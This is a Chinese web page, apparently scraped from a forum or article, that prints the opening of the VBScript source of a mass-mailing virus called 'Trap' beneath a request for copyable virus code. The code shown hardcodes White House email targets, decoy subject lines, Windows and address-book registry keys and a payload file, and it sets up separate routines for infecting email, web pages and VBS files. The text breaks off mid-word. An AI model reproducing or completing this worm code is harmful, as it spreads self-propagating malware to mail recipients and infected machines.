‘借刀杀人’,病毒名称“陷阱”On Error Resume Next Dim vbscr, fso, w1, w2, MSWKEY, HCUW, Code_Str, Vbs_Str, Js_Str Dim defpath, smailc, MAX_SIZE Dim whb(), title(10)smailc = 4 Redim whb(smailc)’白宫相关人员邮件名单 whb(0) = "president@whitehouse.gov"whb(1) ...
给个C病毒代码.....要复制的....越长越好
下面详细揭秘了“陷阱”病毒的发作过程和源代码。病毒具有自身加密能力,使用JavaScript编码技术,使普通用户无法直接看到病毒的原始代码,但在被感染的VBS文件中并未加密,因此作为一个入口点,作者轻松获得了所有源代码。
“陷阱”病毒的代码如下:
‘借刀杀人’,病毒名称“陷阱”
On Error Resume Next
Dim vbscr, fso, w1, w2, MSWKEY, HCUW, Code_Str, Vbs_Str, Js_Str
Dim defpath, smailc, MAX_SIZE
Dim whb(), title(10)
smailc = 4
Redim whb(smailc)
’白宫相关人员邮件名单
whb(0) = "president@whitehouse.gov"
whb(1) = "vice.president@whitehouse.gov "
whb(2) = "first.lady@whitehouse.gov"
whb(3) = "mrs.cheney@whitehouse.gov"
’发送邮件的主题
title(0) = "Thanks for helping me!"
title(1) = "The police are investigating the robbery"
title(2) = "an application for a job "
title(3) = "The aspects of an application process pertinent to OSI"
title(4) = "What a pleasant weather. Why not go out for a walk?"
title(5) = "These countries have gone / been through too many wars"
title(6) = "We've fixed on the 17th of April for the wedding"
title(7) = "The wind failed and the sea returned to calmness."
title(8) = "the sitting is open!"
title(9) = ""
defpath = "C:\Readme.html"
’病毒文件
MAX_SIZE = 100000
’定义传染文件的最大尺寸
MSWKEY = "HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Windows\"
HCUW = "HKEY_CURRENT_USER\Software\Microsoft\WAB\"
Main
Sub main()
On Error Resume Next
Dim w_s
w_s = WScript.ScriptFullName
’得到病毒文件本身的路径
if w_s = "" then
Err.Clear
Set fso = CreateObject("Scripting.FileSystemObject")
’创建文件系统对象
if getErr then
’辨认病毒状态
Randomize
’初始化随机种子
ra = int(rnd() * 7)
’产生随机数
document.write title(ra)
’ 写随机内容
ExecuteMail
’执行邮件状态时的程序
else
ExecutePage
’执行 WEB 页状态时的程序
end if
else
ExecuteVbs
’执行 VBS 文件状态时的程序
e2024-12-01